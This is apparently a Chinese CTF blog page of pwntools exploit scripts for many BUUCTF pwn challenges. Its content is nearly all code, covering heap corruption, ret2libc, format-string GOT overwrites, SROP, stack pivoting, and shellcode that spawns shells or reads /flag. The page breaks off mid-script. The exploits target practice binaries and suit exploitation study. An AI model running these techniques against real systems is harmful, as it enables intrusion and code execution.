PWN-BUUCTF-3

本文最后更新于 2025年12月24日 凌晨

0ctf_2017_babyheap

考点

  • HEAP
    • 堆布局
    • House of Spirit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
# Exp
## 跟babyheap_0ctf_2017一样
def Add(size,content):
    sla('Command: ',str(1))
    sla('Size: ',str(size))

def Edit(index,size,content):
    sla('Command: ',str(2))
    sla('Index: ',str(index))
    sla('Size: ',str(size))
    sla('Content: ',content)

def Del(index):
    sla('Command: ',str(3))
    sla('Index: ',str(index))

def Show(index):
    sla('Command: ',str(4))
    sla('Index: ',str(index))

Add(0x10,b'aaaa') # idx = 0
Add(0x10,b'aaaa') # idx = 1
Add(0x10,b'aaaa') # idx = 2

Add(0x10,b'aaaa') # idx = 3
Add(0x80,b'aaaa') # idx = 4
Add(0x10,b'aaaa') # idx = 5

Del(1)
Del(2)

thunk1_prev_size = 0
thunk1_size = 0x21

thunk2_prev_size = 0
thunk2_size = 0x21

payload = junk(0x10)

payload += p(thunk1_prev_size) + p(thunk1_size)
payload += junk(0x10)

payload += p(thunk2_prev_size) + p(thunk2_size)
payload += p8(0x80)
Edit(0,len(payload),payload)

thunk4_prev_size = 0
thunk4_size = 0x21 #0x91

payload = junk(0x10)
payload += p(thunk4_prev_size) + p(thunk4_size)
Edit(3,len(payload),payload)

Add(0x10,b'aaaa') # idx = 1
Add(0x10,b'aaaa') # idx = 2 | idx = 4

thunk4_size = 0x91
payload = junk(0x10)
payload += p(thunk4_prev_size) + p(thunk4_size)
Edit(3,len(payload),payload)

Del(4)

Show(2)
ru('Content: \n')
main_area = u(r_x64()) - 88
__malloc_hook = main_area - 0x10

libc = LibcSearcher('__malloc_hook',__malloc_hook)
libcbase = __malloc_hook - libc.dump('__malloc_hook')

lgs(hex(main_area),'main_area')
lgs(hex(__malloc_hook),'__malloc_hook')
lgs(hex(libcbase),'libcbase')

one_gadgets = [i+libcbase for i in [0x4526a, 0xf02a4, 0xf1147] ]

Add(0x60,b'aaaa') # idx = 4
Del(4)

fake_thunk = __malloc_hook - 0x23
thunk4_size = 0x71
payload = junk(0x10)
payload += p(thunk4_prev_size) + p(thunk4_size)
payload += p(fake_thunk)
Edit(3,len(payload),payload)

Add(0x60,b'aaaa') # idx = 4
Add(0x60,b'aaaa') # idx = 6

num = __malloc_hook - fake_thunk - 0x10
payload = junk(num)
payload += p(one_gadgets[0])

Edit(6,len(payload),payload)

Add(0x10,b'aaaa')

inter()

ciscn_2019_n_3

考点

  • HEAP
    • 堆重叠
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
def Add_Integer(idx,content):
    sla('CNote > ',str(1))
    sla('Index > ',str(idx))
    sla('Type > ',str(1))
    sla('Value > ',str(content))

def Add_Str(idx,size,content):
    sla('CNote > ',str(1))
    sla('Index > ',str(idx))
    sla('Type > ',str(2))
    sla('Length > ',str(size))
    sla('Value > ',content)

def Del(index):
    sla('CNote > ',str(2))
    sla('Index > ',str(index))

def Show(index):
    sla('CNote > ',str(3))
    sla('Index > ',str(index))

Add_Str(0,0x10,'aaaa')
Add_Str(1,0x10,'aaaa')
Del(0)
Del(1)

payload = b'sh\x00\x00'+p(elf.plt['system'])
Add_Str(2,0xc,payload)
Del(0)

inter()

mrctf2020_shellcode_reveng

考点

  • Ret2Shellcode
1
2
# Exp
payload = b'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'

babyfengshui_33c3_2016

考点

  • HEAP
    • 堆溢出
      • 堆合并
  • Ret2libc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
def Add(size,length,content):
    sla('Action: ',str(0))
    sla('size of description: ',str(size))
    sla('name: ','TY')
    sla('text length: ',str(length))
    sla('text: ',content)

def Edit(index,text_size,content):
    sla('Action: ',str(3))
    sla('index: ',str(index))
    sla('text length: ',str(text_size))
    sla('text: ',content)

def Show(index):
    sla('Action: ',str(2))
    sla('index: ',str(index))

def Del(index):
    sla('Action: ',str(1))
    sla('index: ',str(index))

Add(0x80,0x80,'aaaa')   #idx = 0
Add(0x80,0x80,'bbbb')   #idx = 1

Del(0)

Add(0x108,0x108,'cccc')       #idx = 2
Add(0x10,0x10,'/bin/sh\x00')    # idx = 3
thunk1_0_prev_size = 0x110
thunk1_0_size = 0x88

payload = junk(0x108)
payload += p(thunk1_0_prev_size) + p(thunk1_0_size)
payload += junk(0x80)

thunk1_1_prev_size = 0
thunk1_1_size = 0x88
free_got = elf.got['free']

payload += p(thunk1_1_prev_size) + p(thunk1_1_size)
payload += p(free_got)

Edit(2,len(payload),payload)

Show(1)
ru('description: ')
free_addr = u(r_x86())
lgs(hex(free_addr),'free_addr')

libc = ELF(select_libc()) # libc-2.23-11.so
libcbase = free_addr - libc.sym['free']
# libc = LibcSearcher('free',free_addr)
# libcbase = free_addr - libc.dump('free')

lgs(hex(libcbase),'libcbase')

tmp = LLSysBin(libc,libcbase)

payload = p(tmp[0])

Edit(1,len(payload),payload)

Del(3)

inter()

hitcon2014_stkof

考点

  • HEAP
    • Unlink/House of Spirit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
# Exp - Ret2libc
def Add(size):
    sl(str(1))
    sl(str(size))

def Edit(index,size,content):
    sl(str(2))
    sl(str(index))
    sl(str(size))
    sl(content)

def Del(index):
    sl(str(3))
    sl(str(index))

note_arrary = 0x0602140

puts_plt = elf.plt['puts']
free_got = elf.got['free']
puts_got = elf.got['puts']
Add(0x10) # idx = 1
Add(0x40) # idx = 2 : note_arrary + 0x10
Add(0x80) # idx = 3

fake_thunk_prev_size = 0
fake_thunk_size = 0x41
fake_thunk_fd = note_arrary + 0x10 - (0x8*3)
fake_thunk_bk = note_arrary + 0x10 - (0x8*2)

thunk1_prev_size = 0x40
thunk1_size = 0x90

payload = p(fake_thunk_prev_size) + p(fake_thunk_size)
payload += p(fake_thunk_fd) + p(fake_thunk_bk)
payload += junk(0x20)
payload += p(thunk1_prev_size) + p(thunk1_size)

Edit(2,len(payload),payload)
Del(3)

payload = p(0) + p(0) + p(puts_got) + p(free_got)
Edit(2,len(payload),payload)

payload = p(puts_plt)
Edit(2,len(payload),payload)

# gdp()  
Del(1)
puts_addr = u(r_x64(1))
lgs(hex(puts_addr),'puts_addr')

libc = LibcSearcher('puts',puts_addr)
libcbase = puts_addr - libc.dump('puts')
tmp = SLSysBin(libc,libcbase)
payload = p(tmp[0])
Edit(2,len(payload),payload)

Add(0x10) # idx = 4
payload = b'sh\x00'
Edit(4,len(payload),payload)

Del(4)
inter() 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
#EXP - Dynelf
def Add(size):
    sl(str(1))
    sl(str(size))

def Edit(index,size,content):
    sl(str(2))
    sl(str(index))
    sl(str(size))
    sl(content)

def Del(index):
    sl(str(3))
    sl(str(index))

def Refresh(index):
    sl(str(4))
    sl(str(index))

def leak(address):
    payload = p(address)
    Edit(3,len(payload),payload)
    Refresh(2)
    ru('//TODO\nOK\n')
    Del(1)
    data = r()
    data = data.split(b'\nOK')[0][:n]
    if data==b"":
        data = b"\x00"
    lgs("%#x => %s" % (address, data))
    return data

note_arrary = 0x0602140

puts_plt = elf.plt['puts']
free_got = elf.got['free']
puts_got = elf.got['puts']
fread_got = elf.got['fread']

Add(0x10) # idx = 1
Add(0x40) # idx = 2 : note_arrary + 0x10
Add(0x80) # idx = 3

fake_thunk_prev_size = 0
fake_thunk_size = 0x41
fake_thunk_fd = note_arrary + 0x10 - (0x8*3)
fake_thunk_bk = note_arrary + 0x10 - (0x8*2)

thunk1_prev_size = 0x40
thunk1_size = 0x90

payload = p(fake_thunk_prev_size) + p(fake_thunk_size)
payload += p(fake_thunk_fd) + p(fake_thunk_bk)
payload += junk(0x20)
payload += p(thunk1_prev_size) + p(thunk1_size)

Edit(2,len(payload),payload)
Del(3)

payload = p(0) + p(0) + p(puts_got) + p(free_got) + p(note_arrary+8)
Edit(2,len(payload),payload)

payload = p(puts_plt)
Edit(2,len(payload),payload)

d = DynELF(leak=leak,elf=elf)
sysaddr = d.lookup('system','libc')
lgs(hex(sysaddr),'sysaddr')

payload = p(sysaddr)
Edit(2,len(payload),payload)

Add(0x10) # idx = 4
payload = b'sh\x00'
Edit(4,len(payload),payload)

Del(4)

inter()

jarvisoj_level5

考点

  • Ret2libc
  • 栈平衡
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
rsi_r15_ret = 0x00000000004006b1
rdi_ret = 0x00000000004006b3
ret = 0x0000000000400499

def leak(address):
    payload = junk(0x80+8) + p(rsi_r15_ret) + p(address) + p(0) + p(rdi_ret) + p(1) + p(elf.sym['write']) + p(elf.sym['main'])
    sla('Input:\n',payload)
    data = r()

    if data == b"":
        data = b'\x00'
    lgs("%#x => %s" % (address,data))
    return data

d = DynELF(leak,elf=elf)
sysaddr = d.lookup('system','libc')
lgs(hex(sysaddr),'sysaddr')  
buf = 0x00600A88
# libc-2.23.10.so
payload = junk(0x80+8) + p(rsi_r15_ret) + p(buf) + p(0) + p(rdi_ret) + p(0) + p(ret) + p(elf.sym['read'])
payload += p(rdi_ret) + p(buf)+ p(sysaddr)
sl(payload)

sl('sh\x00')
cat()
inter()

wdb_2018_2nd_easyfmt

考点

  • fmt
  • Ret2libc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
ru('repeater?\n')
payload = b'%7$s' + p(elf.got['printf'])
sl(payload)
printf_addr = u(r_x86())
lgs(hex(printf_addr),'printf_addr')

libc = ELF(local_libc()) # libc-2.23-11.so
libcbase = printf_addr - libc.sym['printf']
tmp = LLSysBin(libc,libcbase)
sysaddr = tmp[0]

payload = fmtstr_payload(6,{elf.got['printf']:sysaddr})
sl(payload)

sl('sh\x00')

inter()

pwnable_hacknote

考点

  • Heap
    • UAF
    • Ret2libc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
# Exp
def Add(size,content):
    sla('choice :',str(1))
    sla('Note size :',str(size))
    sa('Content :',content)

def Edit(index,size,content):
    sla('choice :',str(3))
    sla('Index :',str(index))
    sla('Size of Heap : ',str(size))
    sla('Content of heap : ',content)   

def Del(index):
    sla('choice :',str(2))
    sla('Index :',str(index))


def Show(index):
    sla('choice :',str(3))
    sla('Index :',str(index))

Add(0x10,b'sh\x00') # idx = 0
Add(0x10,b'sh\x00') # idx = 1
Del(0)
Del(1)

func_puts = 0x0804862B
payload = p(func_puts) + p(elf.got['puts'])
Add(0x8,payload) # idx = 2
Show(0)

puts_addr = u(r_x86())
lgs(hex(puts_addr),'puts_addr')

libc = ELF(select_libc()) # libc-2.23-11.so
libcBase = puts_addr - libc.sym['puts']
lgs(hex(libcBase),'libcBase')
tmp = LLSysBin(libc,libcBase)
sysaddr = tmp[0]
lgs(hex(sysaddr),'sysaddr')

Del(2)
payload = p(sysaddr) + b';sh\x00'
Add(0x8,payload) # idx = 3
Show(0)

picoctf_2018_got_shell

考点

  • got替换
1
2
3
4
5
6
7
8
9
# Exp
## 第一次输入的值作为地址,第二次的值为第一次地址的值
payload = elf.got['puts']
sl(hex(payload))

payload = elf.sym['win']
sl(hex(payload))

inter()

mrctf2020_easy_equation

考点

  • Ret2text
  • fmt
1
2
3
4
5
6
7
8
9
10
11
12
# Exp-fmt
x = elf.sym['judge']
value = 2

payload = b'a' + fmtstr_payload(8,{x:1})
sl(payload)

# Exp-Ret2text
payload = junk(0x1+8) + p(0x04006D0)
sl(payload)

# 或者用fmt替换puts的got为system也行

ciscn_2019_es_7

考点

  • SROP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
syscall_ret = 0x0000000000400517
backdoor = 0x04004DA

payload = junk(0x10) + p(elf.sym['vuln'])
s(payload)

r(0x10+8+8)
leak_addr = u(r_x64())
buf = leak_addr - 0x118
lgs(hex(leak_addr),'leak_addr')
lgs(hex(buf),'buf')

frame = SigreturnFrame()
frame.rax = 0x3b
frame.rdi = buf
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_ret

payload = b'/bin/sh\x00'
payload = payload.ljust(0x10) + p(backdoor) + p(syscall_ret) + bytes(frame)

s(payload)

inter()

cmcc_pwnme2

考点

  • stack参数传递
  • Ret2libc
1
2
3
4
5
6
7
# Exp 但是buu没这个文件,无法打通
Refresh_ret = 0x08048409
payload = junk(0x6C+4) + p(elf.sym['add_home']) + p(Refresh_ret) + p(0xDEADBEEF) 
payload += p(elf.sym['add_flag']) + p(elf.sym['exec_string']) + p(0xCAFEBABE) + p(0xABADF00D)
sl(payload)

inter()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# Exp - Ret2libc
payload = junk(0x6C+4) + p(elf.sym['puts']) + p(elf.sym['main']) + p(elf.got['puts'])

sl(payload)

ru('Hello, ')
rl()
puts_addr = u(r_x86())
lgs(hex(puts_addr),'puts_addr')

libc = ELF(select_libc())
libcBase = puts_addr - libc.sym['puts']
tmp = LLSysBin(libc,libcBase)
sysaddr = tmp[0]
shaddr = tmp[1]
lgs(hex(sysaddr),'sysaddr')
lgs(hex(libcBase),'libcBase')
lgs(hex(shaddr),'shaddr')

payload = junk(0x6C+4) + p(sysaddr) + p(0x8048785) + p(shaddr)
sl(payload)

inter()

picoctf_2018_can_you_gets_me

考点

  • 静态mprotect
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# Exp
mprotect = elf.sym['mprotect']
readPlt = elf.sym['read']

mAddr = 0x080EB000
mLen = 0x1000
mStats = 0x7
Reflash_ret = 0x0806303b

payload = junk(0x18+4)
payload += p(mprotect)+ p(Reflash_ret) + p(mAddr) + p(mLen) + p(mStats)
payload += p(readPlt)+ p(mAddr) + p(0) + p(mAddr) + p(mLen)
sl(payload)

shellCode = asm(shellcraft.sh())
sl(shellCode)

inter()

roarctf_2019_easy_pwn

考点

  • HEAP
  • House of Spirit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
# Exp
def Add(size):
    sla('choice: ',str(1))
    sla('size: ',str(size))

def Edit(index,size,content):
    sla('choice: ',str(2))
    sla('index: ',str(index))
    sla('size: ',str(size))
    sla('content: ',content)   

def Del(index):
    sla('choice: ',str(3))
    sla('index: ',str(index))

def Show(index):
    sla('choice: ',str(4))
    sla('index: ',str(index))

Add(0x18) # idx = 0
Add(0x10) # idx = 1
Add(0x60) # idx = 2
Add(0x80) # idx = 3

thunk1_prev_size = 0
thunk1_size = 0x91
payload = p(0) * 2
payload += p(thunk1_prev_size) + p8(thunk1_size)
Edit(0,0x18+0xa,payload)

Del(1)
Add(0x10) # idx = 1

Show(2)
ru('content: ')
main_arena = u(r_x64()) - 88
__malloc_hook = main_arena - 0x10

libc = LibcSearcher('__malloc_hook',__malloc_hook)
libcbase = __malloc_hook - libc.dump('__malloc_hook')

realloc = libcbase + libc.dump('realloc')

lgs(hex(main_arena),'main_arena')
lgs(hex(libcbase),'libcBase')
lgs(hex(__malloc_hook),'__malloc_hook')
lgs(hex(realloc),'realloc')

one_gadgets = [i+libcbase for i in [0x4526a, 0xf02a4, 0xf1147] ]

Add(0x60) # idx = 4 | idx = 2

Del(4)

fake_thunk = __malloc_hook - 0x23
payload = p(fake_thunk)
Edit(2,len(payload),payload)

Add(0x60) # idx = 4 | idx = 2
Add(0x60) # idx = 5

num = __malloc_hook - fake_thunk - 0x10 - 0x8
payload = num*b'\x00' + p(one_gadgets[0]) + p(realloc)   

Edit(5,len(payload),payload)

Add(0x10)

cat()
inter()

npuctf_2020_easyheap

考点

  • HEAP
    • 堆块重叠
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
# Exp
def Add(size,content):
    sla('choice :',str(1))
    sla('Size of Heap(0x10 or 0x20 only) : ',str(size))
    sla('Content:',content)

def Edit(index,content):
    sla('choice :',str(2))
    sla('Index :',str(index))
    # sla('size: ',str(size))
    sla('Content: ',content)   

def Show(index):
    sla('choice :',str(3))
    sla('Index :',str(index))

def Del(index):
    sla('choice :',str(4))
    sla('Index :',str(index))

Add(0x18,'aaaa') # idx = 0
Add(0x18,'aaaa') # idx = 1

thunk1_prev_size = 0
thunk1_size = 0x41

payload = b'/bin/sh\x00'+p(0) 
payload += p(thunk1_prev_size) + p8(thunk1_size)
Edit(0,payload)
Del(1)

Add(0x38,'aaaa') # idx = 1

free_got = elf.got['free']
thunk1_size = 0x21

payload = p(0)*2 
payload += p(thunk1_prev_size) + p(thunk1_size)
payload += p(0x38) + p(free_got)
Edit(1,payload)

Show(1)
ru('Content : ')
free_addr = u(r_x64())
lgs(hex(free_addr),'free_addr')

libc = LibcSearcher('free',free_addr) # libc6_2.27-0ubuntu3_amd64
libcBase = free_addr - libc.dump('free')
tmp = SLSysBin(libc,libcBase)
sysaddr = tmp[0]
lgs(hex(sysaddr),'sysaddr')
lgs(hex(libcBase),'libcBase')

payload = p(sysaddr)
Edit(1,payload)

Del(0)

inter()

x_ctf_b0verfl0w

考点

  • 栈溢出
  • Ret2shellcode
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# Exp
jmp_esp = 0x8048504

code = """
xor     ecx, ecx
mul     ecx
push    ecx
push    0x68732f2f
push    0x6e69622f
mov     ebx, esp
mov     al, 0xb
int     0x80
"""
payload = p(jmp_esp) + asm(code)
payload = payload.ljust(0x24,b'a') + p(elf.sym['hint'])
sl(payload)

inter()

suctf_2018_basic pwn

考点

  • 栈溢出
1
2
# Exp
payload = junk(0x110+8) + p(0x0401157)

hitcontraining_bamboobox

考点

  • HEAP
  • Unlink/HOF
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
# Exp
## 按道理通过堆块重叠打__malloc_hook-realloc调整也是能打的但是打不通,不知道为什么
def Add(size,content):
    sla('choice:',str(2))
    sla('length of item name:',str(size))
    sla('name of item:',content)

def Edit(index,size,content):
    sla('choice:',str(3))
    sla('index of item:',str(index))
    sla('length of item name:',str(size))
    sla('new name of the item:',content)   

def Show(index=None):
    sla('choice:',str(1))
    # sla('index of item:',str(index))

def Del(index):
    sla('choice:',str(4))
    sla('index of item:',str(index))

Add(0x10,b'aaaa') # idx = 0
Add(0x10,b'aaaa') # idx = 1
Add(0x60,b'aaaa') # idx = 2 
Add(0x80,b'aaaa') # idx = 3 

thunk1_prev_size = 0
thunk1_size = 0x91
payload = junk(0x10)
payload += p(thunk1_prev_size) + p(thunk1_size)

Edit(0,len(payload),payload)
Del(1)

Add(0x10,b'aaaa') # idx = 1

Show()
ru('2 : ')

main_arena = u(r_x64()) - 88
__malloc_hook = main_arena - 0x10

# libc = ELF(local_libc())
libc = LibcSearcher('__malloc_hook',__malloc_hook)
libcBase = __malloc_hook - libc.sym['__malloc_hook']
realloc = libcBase + libc.sym['realloc']

# libcBase = __malloc_hook -0x3c3b10
lgs(hex(main_arena),'main_arena')
lgs(hex(__malloc_hook),'__malloc_hook')
lgs(hex(libcBase),'libcBase')
lgs(hex(realloc),'realloc')

fake_thunk = __malloc_hook - 0x23
one_gadgets = [i+libcBase for i in [0x4526a, 0xf02a4, 0xf1147] ]

Add(0x60,b'aaaa') # idx = 4 | idx = 2

Del(4)

thunk2_prev_size = 0
thunk2_size = 0x71
payload = junk(0x10)
payload += p(thunk2_prev_size) + p(thunk2_size)
payload += p(fake_thunk)
Edit(1,len(payload),payload)

Add(0x60,b'aaaa') # idx = 4 | idx = 2

Add(0x60,b'aaaa') # idx = 5

num = __malloc_hook - fake_thunk - 0x10 - 0x8
payload = b'\x00'*num + p(one_gadgets[0]) + p(realloc)

Edit(5,len(payload),payload)
Add(0x10,b'aaaa')

inter()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
# Exp Unlink
def Add(size,content):
    sla('choice:',str(2))
    sla('length of item name:',str(size))
    sla('name of item:',content)

def Edit(index,size,content):
    sla('choice:',str(3))
    sla('index of item:',str(index))
    sla('length of item name:',str(size))
    sla('new name of the item:',content)   

def Show(index=None):
    sla('choice:',str(1))
    # sla('index of item:',str(index))

def Del(index):
    sla('choice:',str(4))
    sla('index of item:',str(index))

Add(0x10,b'aaaa') # idx = 0
Add(0x20,b'aaaa') # idx = 1
Add(0x80,b'aaaa') # idx = 2 
Add(0x80,b'aaaa') # idx = 3 

P = 0x06020C0+8 + 0x10

P_prev_size = 0
P_size = 0x21
P_fd = P - (0x8 * 3)
P_bk = P - (0x8 * 2)

thunk2_prev_size = P_size - 1
thunk2_size = 0x90

payload = p(P_prev_size) + p(P_size)
payload += p(P_fd) + p(P_bk)
payload += p(thunk2_prev_size) + p(thunk2_size)

Edit(1,len(payload),payload)

Del(2)

thunk0_size = 0
thunk0 = elf.got['atoi']

payload = p(thunk0_size) + p(thunk0)
Edit(1,len(payload),payload)

Show()

ru('0 : ')
atoi = u(r_x64())
libc = ELF(local_libc())# libc-2.23-10.so
libcBase = atoi - libc.sym['atoi']
tmp = LLSysBin(libc,libcBase)
sysaddr = tmp[0]

lgs(hex(atoi),'atoi')
lgs(hex(libcBase),'libcBase')
lgs(hex(sysaddr),'sysaddr')

payload = p(sysaddr)

Edit(0,len(payload),payload)
sl('sh\x00')

inter()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
# Exp
## 原题利用HOF可以直接调用magic函数,但是buuctf重新部署了,就没有对应的目录无法读取到flag
SIZE_SZ = 0x8 if elf.arch == 'amd64' else 0x4
MALLOC_ALIGN_MASK = 2 * SIZE_SZ - 1

def Add(size,content):
    sla('choice:',str(2))
    sla('length of item name:',str(size))
    sla('name of item:',content)

def Edit(index,size,content):
    sla('choice:',str(3))
    sla('index of item:',str(index))
    sla('length of item name:',str(size))
    sla('new name of the item:',content)   

def Show(index=None):
    sla('choice:',str(1))
    # sla('index of item:',str(index))

def Del(index):
    sla('choice:',str(4))
    sla('index of item:',str(index))

Add(0x30,'aaaa')

top_thunk_prev_size = 0
top_thunk_size = Negative_1

payload = p(0)*6
payload += p(top_thunk_prev_size) + p(top_thunk_size)

Edit(0,len(payload),payload)

offset_to_heap_base = -(0x40 + 0x20)
req = offset_to_heap_base - SIZE_SZ - MALLOC_ALIGN_MASK

Add(req,'aaaa')
payload = p(0xdeadbeef) + p(elf.sym['magic'])

Add(0x10,payload)

sl('5')

inter()

picoctf_2018_leak_me

考点

  • puts输出遇\x00结束
1
2
3
# Exp
## pwd在ebp - 0x54上,我们输入的地址在ebp - 0x154,使得字符串不被\x00截断即可
pwd = 'a_reAllY_s3cuRe_p4s$word_f85406'

inndy_echo

考点

  • fmt
1
2
# Exp
payload = fmtstr_payload(7,{elf.got['printf']:elf.plt['system']})

actf_2019_babyheap

考点

  • HEAP
  • malloc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# Exp
def Add(size,content):
    sla('choice: ',str(1))
    sla('size: ',str(size))
    sa('content: ',content)

def Show(index):
    sla('choice: ',str(3))
    sla('index: ',str(index))

def Del(index):
    sla('choice: ',str(2))
    sla('index: ',str(index))

sh_addr = 0x0602010

Add(0x40,b'aaaa') # idx = 0
Add(0x40,b'aaaa') # idx = 1
Del(0)
Del(1)
payload = p(sh_addr) + p(elf.plt['system'])

Add(0x10,payload) # idx = 2

Show(0)

actf_2019_babystack

考点

  • stack
  • 栈迁移
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
# Exp
rdi_ret = 0x0000000000400ad3
ret = 0x0000000000400709
leave_ret = 0x0000000000400a18

sla('>',str(0xE0))

ru('Your message will be saved at ')
buf = int(rl(),16)
rbp = buf+0xd0
lgs(hex(buf),'buf')
lgs(hex(rbp),'rbp')

payload = p(rdi_ret) + p(elf.got['puts']) + p(elf.sym['puts']) + p(ret) + p(0x04008F6)
payload = payload.ljust(0xD0,b'a')
payload += p(buf - SIZE_SZ) + p(leave_ret)

sa('>',payload)

ru('Byebye~\n')
puts_addr = u(r_x64())
lgs(hex(puts_addr),'puts_addr')

libc = LibcSearcher('puts',puts_addr) # libc6_2.27-0ubuntu2_amd64
libcBase = puts_addr - libc.dump('puts')
tmp = SLSysBin(libc,libcBase)
system_addr = tmp[0]
bin_sh_addr = tmp[1]

lgs(hex(libcBase),'libcBase')
lgs(hex(system_addr),'system_addr')
lgs(hex(bin_sh_addr),'bin_sh_addr')

sla('>',str(0xE0))
ru('Your message will be saved at ')
buf = int(rl(),16)
lgs(hex(buf),'buf')

payload = p(rdi_ret) + p(bin_sh_addr) + p(system_addr)
payload = payload.ljust(0xD0,b'a')
payload += p(buf - SIZE_SZ) + p(leave_ret)

sa('>',payload)

inter()

[极客大挑战 2019]Not Bad

考点

  • stack
  • 栈迁移/Ret2shellcode
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# Exp
jmp_rsp = 0x0000000000400a01
Address = 0x123000

orw = shellcraft.open('/flag')
orw += shellcraft.read(3,Address,0x100)
orw += shellcraft.write(1,Address,0x100)

shell_code = """
xor rdi, rdi          
mov esi, 0x123000     
xor rdx, rdx
mov edx, 100   
xor rax, rax      
syscall  
mov rax, 0x123000
call rax
"""

payload = asm(shell_code)
payload = payload.ljust(0x20+8,b'\x90') + p(jmp_rsp) + asm('sub rsp,0x30; jmp rsp')
lgs(hex(len(payload)))

sl(payload)
payload = asm(orw)
sl(payload)

inter()

wustctf2020_easyfast

考点

  • HEAP
  • House Of Spirit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# Exp
## 奇怪的刷新机制
def Add(size,content):
    sl(str(1))
    sl(str(size))
    sl(content)

def Edit(index,content):
    sl(str(3))
    sl(str(index))
    # sla('size: ',str(size))
    sl(content)   

def Del(index):
    sl(str(2))
    sl(str(index))

def Shell():
    sl(str(4))

Add(0x40,'aaaa') # idx = 0
Del(0)
payload = p(0x0602080)
Edit(0,payload)

Add(0x40,'aaaa') # idx = 1
Add(0x40,'aaaa') # idx = 2

payload = p(0)
Edit(2,payload)
Shell()

cat()
inter()

hitcontraining_unlink

1
2
# Exp
## 和hitcontraining_bamboobox一样

axb_2019_fmt64

考点

  • stack
  • fmt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# Exp
## printf_got有点问题,leak strlen
## 0x11,可以先设置0,然后去查看内存是多少就是多少
payload = b'aaaa%9$s' + p(elf.got['strlen'])
sa('tell me:',payload)
ru('Repeater:aaaa')

strlen_addr = u(r_x64())
lgs(hex(strlen_addr),'strlen_addr')

libc = ELF(local_libc()) # libc-2.23-10.so
libcBase = strlen_addr - libc.sym['strlen']
tmp = LLSysBin(libc,libcBase)
system_addr = tmp[0]

lgs(hex(system_addr),'system_addr')
lgs(hex(libcBase),'libcBase')

payload = b'aaaaaaaa'+fmtstr_payload(9,{elf.got['strlen']:system_addr},numbwritten=0x11)
sa('tell me:',payload)

s(';sh;')

inter()

wustctf2020_name_your_cat

考点

  • stack
  • 栈上任意写
1
2
3
4
5
6
7
8
# Exp
sla('>',str(-5))
payload = b'TY'
backdoor = elf.sym['shell']
payload = p(backdoor)
sla('name plz: ',payload)
    
inter()

axb_2019_brop64

考点

  • stack
  • Ret2libc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
# Exp

rdi_ret = 0x0000000000400963
